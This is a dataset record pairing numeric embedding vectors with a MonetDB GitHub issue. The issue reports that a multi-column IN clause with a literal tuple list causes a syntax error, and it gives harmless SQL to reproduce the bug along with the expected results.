-0.007087047211825848, 0.006778591778129339, -0.016976209357380867, -0.004615685902535915, 0.006079921033233404, -0.005485307890921831, -0.012055785395205021, 0.009692196734249592, 0.019027626141905785, -0.004236619919538498, 0.016545115038752556, 0.00002338676858926192, -0.009067852981388569, 0.018254628404974937, 0.013096358627080917, 0.004868396557867527, -0.02118309959769249, 0.005968431010842323, -0.00952867791056633, -0.004017356317490339, 0.011030077002942562, -0.00013971090083941817, 0.03133612126111984, 0.004032221622765064, -0.021287156268954277, 0.0010833111591637135, 0.0010582258692011237, -0.002750086598098278, 0.009885446168482304, -0.007796867284923792, 0.010227348655462265, -0.0001674672676017508, -0.012791618704795837, 0.0025921424385160208, -0.0023189918138086796, -0.011996323242783546, 0.0214358102530241, 0.01984521932899952, 0.017764072865247726, 0.014188960194587708, -0.00772254029288888, 0.029938779771327972, 0.0044373017735779285, 0.02214934676885605, 0.005295774899423122, 0.009372591972351074, 0.004009923432022333, 0.007506993133574724, 0.004481897689402103, 0.013140954077243805, -0.005715720355510712, -0.004541359376162291, 0.008807709440588951, -0.002986073726788163, -0.0014772424474358559, 0.018239762634038925, -0.019265471026301384, -0.022357460111379623, -0.014605189673602581, -0.012999733909964561, 0.00816850084811449, -0.0109260194003582, -0.0005463009583763778, -0.028021153062582016, -0.0033224017824977636, 0.04043370485305786, -0.001967798452824354, -0.008190798573195934, -0.014285584911704063, -0.002432340057566762, 0.0052140154875814915, -0.023561552166938782, 0.020380372181534767, 0.0032945293933153152, -0.004834949504584074, -0.016842423006892204, 0.012709859758615494, 0.0106287132948637, 0.0005950778722763062, -0.014151796698570251, 0.007328609004616737, 0.01523696631193161, 0.02767924964427948, -0.007447531912475824, -0.007848896086215973, -0.006511015817523003, -0.016247808933258057, 0.013965980149805546, 0.0036698789335787296, -0.002324566477909684, 0.0002831381279975176, -0.018537070602178574, 0.017734341323375702, -0.0008496466907672584, 0.010465194471180439, -0.017793802544474602, 0.019637104123830795, -0.013140954077243805, 0.0026218730490654707, -0.006514732260257006, 0.012977435253560543, -0.010651011019945145, -0.009142179973423481, -0.009142179973423481, 0.0011455597123131156, -0.04114723950624466, 0.0032945293933153152, -0.016128886491060257, 0.006871500052511692, 0.011862535960972309, 0.00020416606275830418, 0.006113368086516857, 0.005641393829137087, 0.0058755227364599705, 0.019637104123830795, 0.009335429407656193, 0.03344699740409851, -0.0050988090224564075, 0.027634654194116592, 0.004708594176918268, -0.0005802125087939203, -0.020974984392523766, 0.0030120881274342537, -0.010918587446212769, 0.015608599409461021, 0.012464581988751888, 0.010167887434363365, -0.002605149522423744, 0.005117390770465136, -0.010205050930380821, 0.00039137635030783713, 0.004794070031493902, -0.010145589709281921, -0.00350450212135911, 0.014709247276186943, 0.002822555135935545, -0.0065370299853384495, -0.0029284704942256212, 0.004939006641507149, 0.016232943162322044, 0.017764072865247726, -0.02081146650016308, 0.0013834050623700023, 0.012583504430949688, -0.0034041611943393946, 0.011996323242783546, -0.018314089626073837, 0.004886978305876255, 0.01484303455799818, 0.01596536673605442, 0.0216141939163208, -0.032555077224969864, -0.00775227090343833, -0.008146202191710472, 0.006440405268222094, -0.012464581988751888, -0.01602482795715332, -0.015697792172431946, 0.004883261863142252, 0.016292404383420944, -0.0006048332434147596, -0.010004368610680103, -0.005526187364012003, 0.007960385642945766, -0.011721314862370491, 0.0012486879713833332, 0.00929083302617073, 0.012338226661086082, 0.0045227776281535625, 0.010963182896375656, -0.0014595899265259504, -0.017154594883322716, 0.0032963876146823168, 0.00798268336802721, -0.006250872276723385, -0.008413778617978096, -0.024438606575131416, 0.002833703998476267, 0.002010536380112171, -0.008763113990426064, -0.024379145354032516, 0.014976822771131992, -0.013609211891889572, -0.0051991501823067665, 0.0025308229960501194, 0.009171910583972931, 0.013192983344197273, -0.012338226661086082, -0.01137941237539053, 0.00929083302617073, 0.00400620698928833, 0.00995234027504921, 0.0031495923176407814, 0.011134134605526924, -0.017526227980852127, -0.010138156823813915, -0.027708981186151505, -0.0036847444716840982, 0.010911154560744762, 0.05494226887822151, -0.03338753804564476, -0.016366731375455856, -0.010532088577747345, -0.015281561762094498, -0.005745450966060162, -0.010167887434363365, -0.01149833481758833, 0.00493157422170043, -0.014010576531291008, -0.01996414177119732, 0.0014057030202820897, 0.012828782200813293, -0.010532088577747345, 0.01718432456254959, -0.013252444565296173, 0.0038203904405236244, 0.005002184305340052, 0.007414084859192371, -0.023725071921944618, -0.005384966731071472, -0.0019046207889914513, 0.006685683503746986, -0.016664037480950356, -0.008354317396879196, -0.01876004971563816, -0.03600383549928665, 0.0006415320094674826, 0.009424621239304543, -0.046350106596946716, 0.027515731751918793, -0.0031495923176407814, 0.021985827013850212, -0.005399832036346197, -0.005388683173805475, -0.001678853528574109, -0.009848282672464848, 0.022238537669181824, -0.012063217349350452, -0.011431440711021423, -0.005221448373049498, 0.001036857021972537, -0.0037181912921369076, -0.015170072205364704, -0.0021647640969604254, 0.006719130557030439, 0.013549750670790672, 0.001394554041326046, -0.021049311384558678, 0.005436995532363653, 0.0032852385193109512, -0.0009049271466210485, 0.00819823145866394, 0.00929083302617073, 0.015801848843693733, 0.002190778497606516, 0.0011780776549130678, -0.01475384272634983, 0.018135705962777138, -0.01577211730182171, 0.010182753205299377, -0.025895409286022186, -0.0006986706284806132, -0.023338573053479195, -0.0019232024205848575, 0.00831715390086174, 0.015132908709347248, 0.0004343464388512075, 0.006135666277259588, 0.007109345402568579, -0.0129551375284791, -0.0072654313407838345, -0.00766307907178998, -0.013192983344197273, 0.00019533975864760578, -0.014463968575000763, 0.01041316520422697, -0.010554386302828789, 0.010212483815848827, -0.01960737444460392, -0.013051762245595455, 0.0039578950963914394, 0.008019846864044666, -0.018299223855137825, -0.01298486813902855, -0.002447205362841487, 0.0019510749261826277, 0.013824759982526302, -0.00980368722230196, 0.02287774719297886, -0.0005723153008148074, -0.0029637757688760757, -0.01766001619398594, -0.016664037480950356, 0.012345658615231514, 0.0020179690327495337, -0.007001571822911501, 0.0013564616674557328, -0.008242826908826828, 0.02063308283686638, 0.01797218807041645, -0.003140301676467061, -0.011305085383355618, -0.010048964992165565, 0.006953259464353323, -0.011594959534704685, -0.030682047829031944, -0.03100908361375332, -0.028615765273571014, -0.0025698444806039333, 0.009781388565897942, 0.004087966401129961, -0.008161067962646484, -0.0024546380154788494, 0.0015069731744006276, 0.011966592632234097, 0.013676105998456478, -0.005983296316117048, -0.008904334157705307, -0.00442986935377121, -0.009550976566970348, 0.017318112775683403, 0.02464672178030014, 0.006094786338508129, 0.004678863566368818, 0.01566806063055992, -0.0037423474714159966, -0.004143711645156145, 0.006901230663061142, 0.0035342329647392035, 0.01844787783920765, -0.0008510402985848486, 0.06082894280552864, 0.012100380845367908, -0.01208551600575447, 0.025389987975358963, -0.01490249577909708, 0.028273863717913628, 0.004329528193920851, -0.007804299704730511, -0.0036698789335787296, 0.042217545211315155, 0.002350580645725131, 0.006328915245831013, -0.016916748136281967, 0.01083682756870985, 0.026326503604650497, -0.002857860177755356, -0.002716639544814825, -0.02622244693338871, 0.012397687882184982, -0.014426805078983307, 0.02027631364762783, -0.009015824645757675, 0.0013546034460887313, -0.0034376082476228476, 0.017555957660079002, 0.01001180149614811, 0.03716333210468292, 0.0007316531264223158, -0.005384966731071472, -0.0213168878108263, 0.009394890628755093, 0.004812651313841343, -0.0011985175078734756, 0.011795641854405403, 0.018953299149870872, -0.03484433889389038, -0.007640780881047249, 0.00891919992864132, -0.0030232369899749756, 0.007410368416458368, -0.027545461431145668, -0.022045288234949112, 0.010598982684314251, -0.0018460885621607304, 0.00831715390086174, 0.022848017513751984, 0.0026850507128983736, 0.013274742290377617, -0.01375043299049139, -0.006730279419571161, -0.028853610157966614, -0.002138749696314335, 0.022788554430007935, 0.007618483155965805, -0.012754455208778381, -0.018299223855137825, 0.015831580385565758, 0.0014317174209281802, 0.02439401112496853, -0.013743000105023384, -0.0025568371638655663, 0.023323707282543182, -0.010264512151479721, 0.002750086598098278, 0.023992646485567093, 0.018849242478609085, 0.010725338011980057, -0.020900657400488853, 0.016530249267816544, -0.006938394159078598, -0.005656259134411812, 0.018373550847172737 ]
null
null
null
null
null
null
null
null
null
[ "MonetDB", "MonetDB" ]
**Describe the bug** No table and data needed, the query: ``` select * from s where (s1, s2) in ((42,44), (41,45), (43,42)); ``` results in a ``` syntax error, unexpected ',', expecting NOT_IN or sqlIN in: "select * from s where (s1, s2) in ((42,44)," ``` However, if the values were SELECTed from a table, the query works. **To Reproduce** ``` create table l (l1 int, l2 int, l3 int); create table s (s1 int, s2 int, s3 int); insert into l values (42, 44, 11), (41, 45, 22), (43, 42, 33); insert into s values (41, 44, 10), (42, 44, 20), (34, 44, 30), (41, 45, 40), (34, 45, 50), (34, 44, 60), (42, 44, 70), (42, 44, 80); select * from s where (s1, s2) in ((42,44), (41,45), (43,42)); select * from s where (s1, s2) in (select l1, l2 from l); ``` **Expected behavior** No syntax error should be given. The two select queries should produce the same results: ``` +------+------+------+ | s1 | s2 | s3 | +======+======+======+ | 42 | 44 | 20 | | 41 | 45 | 40 | | 42 | 44 | 70 | | 42 | 44 | 80 | +------+------+------+ ``` **Software versions** - MonetDB version number: Dec2023-SP2 - OS and version: MacOS 14.3.1 - Installed with Homebrew
Multi-column IN clause with value list produces syntax error
https://api.github.com/repos/MonetDB/MonetDB/issues/7497/comments
0
2024-04-19T08:44:37
2024-06-27T13:20:00Z
https://github.com/MonetDB/MonetDB/issues/7497
2,252,432,461
7,497
false
This is a GitHub Issue repo:MonetDB owner:MonetDB Title : Multi-column IN clause with value list produces syntax error Issue date: --- start body --- **Describe the bug** No table and data needed, the query: ``` select * from s where (s1, s2) in ((42,44), (41,45), (43,42)); ``` results in a ``` syntax error, unexpected ',', expecting NOT_IN or sqlIN in: "select * from s where (s1, s2) in ((42,44)," ``` However, if the values were SELECTed from a table, the query works. **To Reproduce** ``` create table l (l1 int, l2 int, l3 int); create table s (s1 int, s2 int, s3 int); insert into l values (42, 44, 11), (41, 45, 22), (43, 42, 33); insert into s values (41, 44, 10), (42, 44, 20), (34, 44, 30), (41, 45, 40), (34, 45, 50), (34, 44, 60), (42, 44, 70), (42, 44, 80); select * from s where (s1, s2) in ((42,44), (41,45), (43,42)); select * from s where (s1, s2) in (select l1, l2 from l); ``` **Expected behavior** No syntax error should be given. The two select queries should produce the same results: ``` +------+------+------+ | s1 | s2 | s3 | +======+======+======+ | 42 | 44 | 20 | | 41 | 45 | 40 | | 42 | 44 | 70 | | 42 | 44 | 80 | +------+------+------+ ``` **Software versions** - MonetDB version number: Dec2023-SP2 - OS and version: MacOS 14.3.1 - Installed with Homebrew --- end body ---
1,386
[ 0.0024001169949769974, 0.004926735535264015, -0.02129334583878517, 0.00985347107052803, -0.003256568918004632, 0.04682621359825134, -0.025149943307042122, 0.036186378449201584, -0.00921754352748394, -0.003407003590837121, -0.01604180783033371, -0.02568330243229866, 0.013313469476997852, 0.0015163131756708026, -0.03049721196293831, 0.034189701080322266, -0.0266132615506649, 0.019351370632648468, -0.04532186686992645, -0.0152349304407835, 0.006157564930617809, 0.016397379338741302, -0.019228287041187286, 0.05530525743961334, -0.004499364644289017, -0.007966199889779091, 0.0008863679831847548, 0.00912181194871664, -0.01758718118071556, 0.012349319644272327, 0.01056461688131094, 0.008308096788823605, 0.02748851850628853, 0.014687894843518734, 0.00817817635834217, -0.0024052453227341175, 0.0009769706521183252, 0.019966784864664078, -0.01993943378329277, 0.034490570425987244, -0.019802674651145935, -0.029895473271608353, 0.0041608866304159164, 0.025655951350927353, -0.03077073022723198, 0.02945784479379654, -0.008520073257386684, 0.003818989498540759, -0.055551424622535706, -0.0011940752156078815, 0.01041418220847845, 0.0023163522128015757, 0.009552601724863052, -0.024862749502062798, -0.0194744523614645, -0.029321085661649704, 0.0010111603187397122, 0.036842819303274155, -0.032876815646886826, 0.0254508126527071, -0.04562273621559143, 0.011419359594583511, -0.008342286571860313, 0.016137538477778435, 0.019269315525889397, 0.008369638584554195, -0.00917651504278183, -0.002853130456060171, -0.02125231735408306, -0.005637881346046925, 0.025519192218780518, 0.017217932268977165, 0.022414768114686012, 0.028527885675430298, 0.013122007250785828, -0.005466932896524668, -0.005241280887275934, -0.0007970473961904645, -0.027502194046974182, 0.0005260939942672849, -0.029102273285388947, 0.002261648653075099, -0.0008440582314506173, 0.03591286018490791, -0.00047438207548111677, 0.035064954310655594, -0.009169677272439003, -0.04543127492070198, -0.034955549985170364, -0.01642473228275776, 0.0041608866304159164, 0.0008479045354761183, 0.012369832955300808, -0.0003540770849213004, 0.022264333441853523, 0.006489205174148083, 0.0044480799697339535, 0.008786752820014954, -0.006407149601727724, 0.0183120034635067, -0.03853863105177879, -0.002795008011162281, 0.03799159452319145, 0.052816249430179596, 0.015029791742563248, -0.008273907005786896, 0.00849955901503563, -0.02610725536942482, 0.03492819890379906, 0.0709504634141922, 0.03328709304332733, -0.021621566265821457, -0.04362605884671211, 0.0024821721017360687, 0.017614534124732018, -0.025341404601931572, 0.020486468449234962, 0.0077337101101875305, 0.01168603915721178, 0.004246360622346401, -0.02606622688472271, -0.023495161905884743, -0.03159128129482269, -0.03651459887623787, -0.016534138470888138, -0.008766238577663898, 0.0038736930582672358, -0.007631141226738691, -0.04920581728219986, -0.028719346970319748, 0.003548890817910433, -0.07330271601676941, -0.03323238715529442, -0.03752661496400833, 0.0069678607396781445, -0.011344142258167267, -0.0014769950648769736, 0.02691413089632988, -0.02722867764532566, -0.01769658923149109, -0.08435282856225967, -0.013381848111748695, 0.04075412079691887, -0.005692584905773401, -0.008766238577663898, -0.003106134245172143, 0.005378039553761482, -0.0018701766384765506, -0.030716026201844215, -0.019802674651145935, 0.012335644103586674, 0.006468691397458315, 0.02136172354221344, 0.008451693691313267, 0.01552212331444025, 0.008171338587999344, 0.0040412223897874355, -0.01699911803007126, 0.04778352379798889, -0.023139588534832, -0.06613655388355255, 0.0011889467714354396, -0.036459896713495255, -0.016835007816553116, -0.04532186686992645, 0.015795640647411346, -0.021197613328695297, 0.04316107556223869, 0.00950473640114069, 0.01172022894024849, -0.003013822017237544, 0.014086156152188778, 0.02341310679912567, 0.02144378051161766, -0.01731366477906704, -0.029239030554890633, 0.0021283088717609644, 0.003468545153737068, 0.006082347594201565, -0.02294812723994255, 0.0007893546717241406, -0.023850735276937485, -0.032329779118299484, -0.004277131520211697, 0.04234052449464798, -0.01989840529859066, 0.0068892245180904865, -0.02510891482234001, 0.08391519635915756, 0.022387415170669556, 0.0027539802249521017, 0.00661228783428669, 0.01939239725470543, -0.013026275672018528, -0.014797301962971687, 0.01133730448782444, -0.034682031720876694, -0.03011428751051426, -0.03230242803692818, -0.014086156152188778, 0.025669626891613007, -0.042860206216573715, -0.017176905646920204, 0.03498290106654167, 0.02610725536942482, 0.024083225056529045, -0.030798081308603287, 0.05973624438047409, -0.0370069295167923, -0.05721988156437874, -0.0057575455866754055, -0.01145354937762022, 0.033834125846624374, -0.023700300604104996, -0.012000584974884987, 0.01210999209433794, 0.00900556705892086, 0.025122592225670815, -0.029512548819184303, 0.006051576696336269, 0.019570184871554375, -0.002839454682543874, 0.027789387851953506, 0.01701279543340206, -0.024903777986764908, 0.025245673954486847, -0.010407344438135624, -0.024001169949769974, -0.038620684295892715, -0.005022467114031315, 0.027132945135235786, 0.023084884509444237, -0.0485767237842083, -0.019187260419130325, 0.005077170208096504, -0.05306241288781166, 0.007966199889779091, -0.028938161209225655, 0.002078733639791608, -0.013812638819217682, 0.03525641933083534, 0.005248119123280048, -0.017327340319752693, -0.003489058930426836, -0.014852005988359451, 0.03914036974310875, -0.020212950184941292, 0.0018582101911306381, 0.02108820714056492, 0.029950177296996117, -0.022934449836611748, -0.030251046642661095, -0.0049780202098190784, -0.03883950039744377, -0.018954768776893616, -0.007494382094591856, 0.05308976769447327, 0.031290411949157715, -0.00277620367705822, -0.03243918716907501, -0.027119269594550133, 0.017573505640029907, -0.07040342688560486, 0.01839405857026577, 0.05002636834979057, -0.013593824580311775, -0.018804334104061127, -0.03930447995662689, -0.029129624366760254, 0.019679591059684753, -0.003938653506338596, -0.014947736635804176, -0.03840187191963196, -0.037198394536972046, -0.00012212133151479065, -0.01145354937762022, 0.00046412518713623285, -0.029977528378367424, -0.003877111943438649, -0.017327340319752693, -0.012752758339047432, 0.008130311034619808, 0.01712220162153244, -0.0027505613397806883, -0.010072285309433937, 0.023495161905884743, 0.04176613688468933, -0.012554457411170006, -0.042039655148983, -0.04176613688468933, -0.006188335828483105, 0.014045128598809242, -0.006492624059319496, 0.01068086177110672, -0.0014445148408412933, 0.0439542792737484, 0.015590502880513668, -0.0014744307845830917, -0.009101297706365585, 0.011303114704787731, -0.02841847762465477, -0.00936797820031643, 0.015822993591427803, 0.0037300961557775736, -0.06952816992998123, 0.0026992768980562687, -0.011474063619971275, 0.04291491210460663, -0.0131083307787776, -0.021621566265821457, -0.0323844850063324, -0.017600856721401215, 0.0017641885206103325, 0.00010940703941741958, -0.0026377353351563215, -0.002494138665497303, 0.033533256500959396, -0.004253198858350515, -0.0019146231934428215, -0.023030182346701622, -0.007275568321347237, -0.005849857814610004, -0.0720992386341095, -0.027119269594550133, 0.034107644110918045, -0.037389855831861496, -0.04668945446610451, 0.005764383357018232, -0.041738785803318024, -0.01500244066119194, 0.017217932268977165, -0.024274686351418495, -0.03224772587418556, 0.011966395191848278, -0.0187086034566164, -0.08068769425153732, -0.0016752952942624688, -0.031563930213451385, -0.01851714216172695, -0.022811368107795715, -0.0044480799697339535, 0.04507569968700409, -0.01669824868440628, 0.0006248167483136058, 0.02718764916062355, 0.004482269752770662, 0.015453744679689407, 0.021854056045413017, 0.06033798307180405, -0.027816738933324814, 0.0007449080585502088, 0.020582199096679688, -0.022619904950261116, 0.0017120492411777377, 0.023659272119402885, -0.027556898072361946, -0.02121128886938095, -0.05842335894703865, 0.03558463975787163, 0.03399823606014252, 0.007049916312098503, -0.03957799822092056, -0.005104522220790386, 0.016028130427002907, -0.003586499486118555, -0.00936797820031643, 0.02964930795133114, -0.009299598634243011, 0.007521734107285738, -0.03708898648619652, -0.03935918211936951, -0.008034579455852509, 0.007603789214044809, -0.006188335828483105, -0.025136267766356468, -0.0074465167708694935, 0.037882186472415924, 0.012602323666214943, 0.03219301998615265, -0.005945588927716017, 0.019023148342967033, 0.006396892946213484, -0.023221643641591072, -0.04365340992808342, -0.014797301962971687, -0.03558463975787163, 0.02000781148672104, 0.01932401768863201, -0.0196659155189991, -0.02830907143652439, 0.009928688406944275, 0.03689752519130707, -0.005323336459696293, -0.05114779248833656, 0.008034579455852509, -0.0019932594150304794, 0.007528571877628565, -0.0037984757218509912, -0.025314053520560265, 0.001739401021040976, 0.013600662350654602, -0.06504248827695847, 0.011036435142159462, -0.0027967174537479877, -0.01704014651477337, 0.016561491414904594, -0.009826119989156723, -0.023344727233052254, 0.021539511159062386, 0.008991891518235207, 0.005627624690532684, -0.008041417226195335, -0.019310342147946358, 0.020418088883161545, 0.0485767237842083, -0.0021436940878629684, -0.0060584149323403835, -0.010585131123661995, -0.02013089507818222, 0.056508734822273254, 0.0032616974785923958, -0.020677929744124413, 0.0017915403004735708, -0.012964733876287937, -0.006475529167801142, -0.004759206436574459, 0.006714857183396816, 0.03722574561834335, 0.00538829667493701, 0.03602226823568344, -0.03230242803692818, 0.001016288879327476, 0.023659272119402885, -0.008704697713255882, -0.010079123079776764, -0.01862654834985733, -0.005248119123280048, 0.03654194995760918, 0.02850053459405899, -0.03837452083826065, -0.006656734738498926, 0.004441242199391127, -0.06526129692792892, 0.009709875099360943, -0.005569502245634794, 0.018489789217710495, -0.03640519082546234, -0.012205722741782665, 0.019255638122558594, -0.009046594612300396, 0.0048857079818844795, 0.023235319182276726, -0.02278401516377926, -0.013163034804165363, 0.003907882608473301, 0.014318645931780338, 0.02318061701953411, 0.024343065917491913, 0.015344337560236454, 0.043516650795936584, -0.03197420760989189, 0.019761646166443825, -0.02375500276684761, -0.04064471647143364, 0.015672558918595314, 0.04734589532017708, 0.012711730785667896, -0.012964733876287937, 0.010530427098274231, -0.034490570425987244, 0.03878479450941086, -0.027679981663823128, -0.03301357477903366, -0.03265799954533577, -0.010256909765303135, 0.036268435418605804, 0.0187086034566164, 0.01827097497880459, -0.016793981194496155, 0.020035164430737495, 0.05530525743961334, -0.0069541847333312035, -0.012007422745227814, 0.01665722206234932, 0.021566862240433693, 0.025355082005262375, -0.011993746273219585, -0.019214611500501633, -0.003459997707977891, 0.007084105629473925, 0.026626938953995705, 0.009662008844316006, -0.03405294194817543, -0.049260519444942474, -0.004540392197668552, -0.02127966843545437, -0.05079221725463867, 0.015713585540652275, 0.01307414099574089, 0.018380383029580116, 0.0025949981063604355, -0.039742108434438705, -0.028664644807577133, -0.00372667727060616, -0.003538633929565549, -0.039003610610961914, 0.019994135946035385, 0.004800233989953995, 0.007651655003428459, 0.00024467005277983844, 0.005548988468945026, -0.028062906116247177, 0.02089674398303032, -0.0397147536277771, 0.005484027788043022, -0.007166161201894283, 0.03358796238899231, 0.009251732379198074, 0.025505516678094864, 0.021703621372580528, 0.011350980028510094, -0.019296666607260704, 0.002519780769944191, -0.004198495298624039, 0.01701279543340206, 0.00745335454121232, 0.015330661088228226, -0.0175461545586586, -0.0310442466288805, 0.01239718496799469, -0.034490570425987244, -0.0015257153427228332, 0.007911496795713902, 0.006663572508841753, -0.015358013100922108, 0.007275568321347237, 0.002063348423689604, 0.006919995415955782, -0.0015265700640156865, -0.000541052024345845, -0.009593630209565163, 0.05530525743961334, 0.005572921130806208, -0.007043078076094389, 0.04515775665640831, 0.02305753342807293, -0.04846731945872307, 0.010639834217727184, -0.016670897603034973, -0.016178565099835396, 0.014783626422286034, 0.04244993254542351, -0.02356354147195816, 0.007200350984930992, 0.0017505126306787133, -0.027351759374141693, 0.02714662253856659, 0.014947736635804176, -0.006441339384764433, -0.006099442485719919, -0.008485883474349976, 0.01712220162153244, -0.00902608036994934, -0.01720425672829151, -0.01962488703429699, -0.005432743113487959, -0.01915990747511387, 0.0017479483503848314, -0.04556803032755852, -0.010571455582976341, 0.01915990747511387, 0.02441144548356533, -0.01213050540536642, -0.037772782146930695, -0.03563934192061424, 0.018530817702412605, -0.002942023565992713, 0.04600565880537033, -0.028828755021095276, -0.017532477155327797, 0.010031257756054401, -0.01892741769552231, -0.025505516678094864, 0.022387415170669556, 0.012000584974884987, -0.01866757683455944, -0.012834813445806503, 0.017217932268977165, -0.010708213783800602, -0.00003755524812731892, -0.010947542265057564, 0.020883068442344666, 0.014359673485159874, 0.0008282454800792038, 0.04622447490692139, -0.009265408851206303, -0.00025962802465073764, 0.0021693364251405, 0.0343264602124691, 0.020021488890051842, -0.01100908312946558, 0.01905050128698349, -0.004485688637942076, -0.022278008982539177, 0.01490670908242464, 0.0021813027560710907, -0.024903777986764908, -0.00025834591360762715, -0.015535799786448479, 0.006434501614421606, -0.0051421308889985085, -0.0014094703365117311, 0.04523980990052223, -0.03216566890478134, 0.004759206436574459, -0.007002050522714853, 0.006386635825037956, 0.0026326067745685577, -0.03066132217645645, 0.014619515277445316, 0.035611990839242935, -0.03706163540482521, 0.014893033541738987, -0.012971572577953339, -0.007549085654318333, 0.04761941358447075, -0.004290807526558638, 0.011528766714036465, -0.012903193011879921, -0.009662008844316006, -0.0277620367705822, -0.0026377353351563215, 0.014304970391094685, -0.02318061701953411, -0.011173194274306297, 0.03998827189207077, -0.00020129185577388853, 0.01528963353484869, -0.0044617559760808945, -0.027050890028476715, 0.020062515512108803, -0.013156196102499962, 0.013046789914369583, 0.008383314125239849, -0.0012547619407996535, -0.0018958188593387604, -0.015686234459280968, 0.0350923091173172, 0.002774494234472513, 0.027871442958712578, 0.002483881777152419, 0.015918724238872528, 0.027597926557064056, 0.005983197595924139, -0.005798573140054941, -0.017847023904323578, 0.026708994060754776, 0.033341795206069946, -0.016835007816553116, 0.022688284516334534, -0.017723940312862396, -0.012287777848541737, -0.02040441334247589, -0.02421998418867588, 0.03955064341425896, -0.012677541002631187, 0.007685844320803881, -0.020677929744124413, 0.006759303621947765, 0.0035694045946002007, -0.01274591963738203, -0.008861970156431198, -0.003459997707977891, -0.020295005291700363, 0.002051382092759013, -0.017190581187605858, -0.008314934559166431, 0.014414377510547638, 0.013388686813414097, -0.023358402773737907, -0.0233310516923666, 0.008677345700562, -0.010202206671237946, 0.004540392197668552, -0.01434599794447422, -0.004820747766643763, 0.004909641109406948, 0.0059729404747486115, 0.0027078241109848022, -0.022428443655371666, 0.010099637322127819, -0.015508447773754597, 0.019912080839276314, 0.029047569260001183, 0.019036825746297836, 0.006417406722903252, 0.05062810704112053, -0.027406463399529457, -0.027967173606157303, -0.02814496122300625, 0.004085669293999672, 0.025314053520560265, -0.004919897764921188, 0.018913742154836655, 0.01900947280228138, -0.00316596613265574, -0.004919897764921188, 0.00902608036994934, -0.0035352150443941355, 0.023891761898994446, 0.004359186626970768, -0.011139004491269588, 0.003914720844477415, -0.016438407823443413, 0.004150629509240389, -0.014414377510547638, 0.02163524180650711, 0.020459115505218506, -0.04310637339949608, -0.00950473640114069, 0.01066034846007824, 0.010202206671237946, -0.013135682791471481, -0.010256909765303135, -0.003644621931016445, -0.010851810686290264, -0.000608149275649339, 0.005955845583230257, 0.028856106102466583, 0.013272441923618317, -0.03708898648619652, 0.01172022894024849, 0.02445247396826744, 0.0005564373568631709, -0.03230242803692818, 0.009662008844316006, 0.016985442489385605, -0.02129334583878517, 0.004236103966832161, -0.009320111945271492, 0.012431374751031399, 0.02066425420343876, -0.030141638591885567, -0.021539511159062386, 0.022920774295926094, 0.020390737801790237, 0.04157467558979988, 0.007870469242334366, 0.012910030782222748, -0.01623326912522316, 0.06372959911823273, 0.01110481470823288, 0.01189801562577486, -0.008102959021925926, -0.0138810183852911, -0.013593824580311775, 0.01631532423198223, 0.023043857887387276, 0.018653899431228638, -0.030415156856179237, 0.013094655238091946, 0.014140860177576542, 0.004875451326370239, 0.008663670159876347, 0.013798963278532028, -0.009634657762944698, -0.010995407588779926, -0.018530817702412605, 0.011378332041203976, -0.004834423772990704, -0.006410568952560425, 0.014865681529045105, -0.00921754352748394, 0.005159225780516863, -0.025751681998372078, -0.027597926557064056, -0.0018650480778887868, 0.014400701969861984, -0.030032232403755188, 0.04017973691225052, -0.010503076016902924, -0.008608966134488583, -0.012670702300965786, 0.008205528371036053, -0.01561785489320755, -0.003781380830332637, 0.014031453058123589, 0.002601836109533906, 0.03219301998615265, -0.014222915284335613, 0.002883901121094823, -0.024397769942879677, -0.011528766714036465, 0.019269315525889397, 0.024466149508953094, -0.026175634935498238, 0.003042883239686489, -0.02896551415324211, -0.037964243441820145, -0.024001169949769974, 0.0037232583854347467, -0.01939239725470543, 0.01936504617333412, -0.003924977499991655, -0.0031710946932435036, -0.015877695754170418, -0.014947736635804176, -0.011166355572640896, -0.0052925655618309975, 0.038702741265296936, 0.0080961212515831, 0.003747191047295928, 0.015207578428089619, -0.0019761647563427687, 0.029211679473519325, 0.015303310006856918, 0.018325679004192352, -0.0075832754373550415, -0.00014658833970315754, -0.0005025885766372085, 0.010386831127107143, 0.0001611189654795453, 0.026517530903220177, -0.005316498223692179, 0.003116391133517027, -0.004848099313676357, -0.007111457642167807, -0.013067303225398064, 0.017559830099344254, -0.017245285212993622, 0.014633191749453545, 0.02746116742491722, -0.02344045788049698, -0.016164889559149742, -0.049725499004125595, 0.02830907143652439, 0.013607500120997429, -0.005747288465499878, -0.0004602788249030709, 0.029977528378367424, 0.004690826870501041, 0.010475724004209042, -0.005176320672035217, 0.009169677272439003, 0.008273907005786896, -0.027939822524785995, -0.00894402526319027, -0.006844778079539537, -0.0093543017283082, 0.03558463975787163, 0.010886000469326973, 0.009326949715614319, -0.02190876007080078, 0.011180032044649124, -0.0196659155189991, 0.01251342985779047, -0.020253978669643402, -0.013429714366793633, 0.020801013335585594, -0.017299987375736237, 0.012670702300965786, 0.021799352020025253, -0.008123472332954407, 0.008978215046226978, 0.011193707585334778, -0.007767899893224239, -0.01561785489320755, -0.03747191280126572, -0.01251342985779047, -0.03386147692799568, -0.009757740423083305, -0.031864799559116364, 0.023782355710864067, 0.00012180080375401303, -0.0002884755958802998, -0.019679591059684753, -0.037499263882637024, 0.0030685255769640207, -0.040890879929065704, -0.014715246856212616, -0.004372862633317709, -0.015494772233068943, -0.030059583485126495, -0.02437041886150837, 0.06181497871875763, 0.019871054217219353, 0.01723160780966282, -0.02981341816484928, -0.01293738279491663, -0.00012009131751256064, 0.024671288207173347, 0.00915600173175335, -0.02915697544813156, -0.011631336063146591, -0.004957506433129311, -0.016602518036961555, -0.040699418634176254, -0.015316985547542572, -0.0012658736668527126, -0.016588842496275902, -0.009183353744447231, -0.022127574309706688, -0.013874180614948273, -0.016096509993076324, 0.010202206671237946, -0.03826511278748512, 0.04307902231812477, 0.023276347666978836, -0.00416430551558733, 0.026886779814958572, 0.019064176827669144, 0.024233659729361534, 0.025054212659597397, -0.00956627819687128, 0.003306143917143345, -0.007808927446603775, -0.04619712382555008, 0.013710069470107555, -0.01206896360963583, 0.015180226415395737, -0.008219203911721706, 0.04001562297344208, 0.022811368107795715, 0.007036240305751562, 0.030442507937550545, -0.015631530433893204, 0.001461609615944326, 0.0044480799697339535, -0.025655951350927353, -0.012021098285913467, -0.02706456556916237, -0.013299793004989624, 0.01366904191672802, 0.017026470974087715, 0.027269704267382622, 0.015330661088228226, 0.013621176593005657, -0.0026291878893971443, 0.020500143989920616, -0.033642664551734924, -0.025929467752575874, 0.04816645011305809, 0.019501805305480957, -0.006581517402082682, 0.014414377510547638, 0.01892741769552231, -0.021142911165952682, 0.023659272119402885, -0.01576828956604004, 0.023782355710864067, -0.004550648853182793, 0.027584249153733253, 